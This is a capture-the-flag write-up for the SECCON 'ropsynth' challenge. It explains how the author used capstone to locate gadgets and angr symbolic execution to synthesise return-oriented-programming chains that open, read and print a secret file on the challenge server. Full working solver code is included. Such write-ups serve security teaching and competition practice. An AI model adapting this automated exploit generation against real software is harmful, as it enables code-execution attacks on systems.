Hey!

In my last writeup, I demonstrated how to use radare2 and angr for some limited automated exploit generation. After an angr-only version of this solution even made its way into the angr-doc examples, I thought it’s time to show some more angr-sugar, this time together with capstone.

For the ropsynth challenge, we were given a tgz-archive, containing the files “launcher.c, launcher.elf, ropsynth.py, seccomp-bpf.h, start_server.sh’ and a Makefile. Additionally, the challenge description told us to connect to their service, open a file with the name “secret”, read its content and write it to stdout.

The most important file for the preliminary analysis is probably launcher.c, which reads from stdin a number of gadgets into a special mapped page and a ropchain into the stack, both in binary format. Additionally, the string “secret” is strcpy’ed to a custom mapped page at 0x00a00000. Afterwards, the function start_rop() is called which basically inserts a small stub in memory and uses seccomp to restrict the syscalls to open, read, write, close, munmap and exit_group, befoe calling the freshly mapped stub. The stub itself is just unmapping the binary and issuing a ret with the first address taken from the supplied ropchain.

The second interesting file is ropsynth.py, which is the script running on the server. When analyzing it, it becomes obvious that it generates gadgets in a blackbox-fashion, sends them to us base64 encoded and expects us to send a ropchain back, also encoded in base64. Afterwards, it provides the gadgets and the ropchain to the launcher and checks, whether the secret-file was read and written correctly. If this procedure was carried out correctly 5 times, the service would tell us the flag.

Thus, to sum it up, in order to solve the challenge we have to:

1) connect to the service
2) read gadgets provided by the binary
3) generate a ropchain which would open the file "secret" and read/write its content
4) send the ropchain to the service
5) repeat step 2-4 four more times

After retrieving, base64-decoding and disassembling some gadgets, it became obvious that they all follow the same format - an exemplary disassembled gadget-blob can be found here. In essence, we have several gadgets starting with popping two registers, whereas the second one gets happily xor’ed, sub’ed and add’ed with immediates. A subsequent cmp validates whether this register has a specific value after this arithmetic madness. If so, the execution continues either to another gadget, again popping a register and xoring/adding/subing its content around, or at a return. If one of the validation check fails at any given time, a halt instruction is issued and the execution stops. Additionally, a couple of special gadgets are present, which do something else instead of popping the first register: One which is carrying out a syscall, and several ones which are pushing rax and popping it into another register, which are certainly useful for generating the desired open/read/write-ropchain.

At this moment, it became clear that this challenge would be excellent solvable with angr. However, before firing up the symbolic execution engine, some parsing has to be done, in order to identify the location of the gadgets. First of all, the gadget-blob should be disassembled in an automatic fashion, which is actually super easy with capstone.

from capstone import *

def disassemble_binary(code):
    binary = []

    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i in md.disasm(code, 0x00800000):
        binary.append(i)

    return binary

Afterwards, we need a way to identify the location of the gadgets we want to use - once again, we can use capstone!

def find_pop_reg(binary, reg):
    for i in binary:
        if i.insn_name() == 'pop' and i.op_str == reg:
            return i.address
    
def find_push_rax_pop_reg(binary, reg):
    for i in range(len(binary)):

        if binary[i].insn_name() == 'pop' and binary[i].op_str == reg \
           and binary[i-1].insn_name() == 'push' and binary[i-1].op_str == 'rax':
            return binary[i-1].address 

def find_syscall(binary):
    for i in binary:
        if i.insn_name() == 'syscall':
            return i.address 

Now, I used some wrapper functions for generating parts of the ropchain, which mostly set up the target-address for the next return and then invoke angr to generate the values needed to pass all checks:

def do_syscall(binary, project):
    syscall = find_syscall(binary)

    pl = struct.pack("<Q",syscall)
    pl += angrize(project, syscall+2)
    return pl


def mov_reg_rax(binary, project, reg):
    push_rax = find_push_rax_pop_reg(binary, reg)

    pl = struct.pack("<Q",push_rax)
    pl += angrize(project, push_rax)
    return pl


def set_reg(binary, project,  reg, val):
    pop_reg  = find_pop_reg(binary, reg)
    pl = struct.pack("<Q",pop_reg)
    pl += struct.pack("<Q",val)

    pl += angrize(project, pop_reg+1)
    return pl

As one can see, the core function for carrying out the work will be angrize() which takes as argument an already opened angr-project and the entry address for analyses. Hereby, the entry-address for the angr-analyses is choosen to skip the syscall and the first register-pop in the according cases, to enforce a consistent stack-frame layout for angr, and to not interpret a syscall wrong in case rax is not initialized.

So, let’s finally have a look at the angrize-function, generating the right payload-values for us:

def angrize(project, entry):
    pl = ''

    #generate a state and a path_group
    path = project.factory.blank_state(addr=entry)
    pg = project.factory.path_group(path)

    #explore
    pg.explore()

    #get the state with the right values
    x = pg.deadended[0]
    
    #dump the stack and put the values in our payload
    for i in xrange(0x7ffffffffff0000, x.state.se.any_int(x.state.regs.rsp),8): #stack starts at 0x7ffffffffff0000 for a x86_64 blank_state
        val = x.state.se.any_int(x.state.memory.load(i,endness='Iend_LE')) #memory endianess deafults to big endian, let's enforce little endian.
        pl += struct.pack("<Q",val)

    return pl

So, why does work? Or, more precise: Why is pg.deadended[0] the state we are looking for? Well, first it has to be pointed out that we totally want to hit a ret-instruction to regain control. However, in a blank_state, the stack is empty, and whenever angr loads an uninitialized memory value, it will be treated as symbolic value. This means, that the address popped from the stack for the ret instruction will be an unconstrained symbolic value, and thus, it is undecidable were execution has to be continued. Therefore, the according path will be inserted into the deadended-stash of the path group. However, this does not happens silently, in fact, angr is emitting warnings about this:

WARNING | 2016-12-15 12:11:20,965 | simuvex.s_run | Exit state has over 257 possible solutions. Likely unconstrained; skipping. <BV64 mem_7ffffffffff0028_334_64>

Furthermore, all other paths will hit a hlt instruction, causing them to be moved into the errored-stash, so that the path group will not have any active states, which ends the exploration.

Alright, let’s put it all together:

def solve_stage(s):

    b64 = s.ru('\n')

    code = base64.b64decode(b64)
    binary_file = open('tmp.bin','w')
    binary_file.write(code)
    binary_file.close()

    project = angr.Project("./tmp.bin", load_options={
        'main_opts': {
            'backend': 'blob',
            'custom_base_addr': 0x00800000,
            'custom_arch': 'x86_64',
        },
    })

    
    binary = disassemble_binary(code)

    pl = ''
    pl += set_reg(binary, project, 'rdi', 0x00a00000)
    pl += set_reg(binary, project, 'rsi', 0x4)
    pl += set_reg(binary, project, 'rdx', 0x0)
    pl += set_reg(binary, project, 'rax', 0x2)
    pl += do_syscall(binary, project)

    pl += mov_reg_rax(binary, project, 'rdi')
    pl += set_reg(binary, project, 'rsi', 0x00a00000)
    pl += set_reg(binary, project, 'rdx', 0x256)
    pl += set_reg(binary, project, 'rax', 0x0)
    pl += do_syscall(binary, project)

    pl += mov_reg_rax(binary, project, 'rdx')
    pl += set_reg(binary, project, 'rdi', 0x1)
    pl += set_reg(binary, project, 'rax', 0x1)
    pl += do_syscall(binary, project) 

    pl = base64.b64encode(pl)
    s.send(pl+'\n')



def main():
    s = Socket(('ropsynth.pwn.seccon.jp',10000))

    for i in range(1,6):
        print '[+] Solving Stage %d' %i   
        s.ru('stage %d/5\n' % i)
        solve_stage(s)

    s.interact()

Cheers,

nsr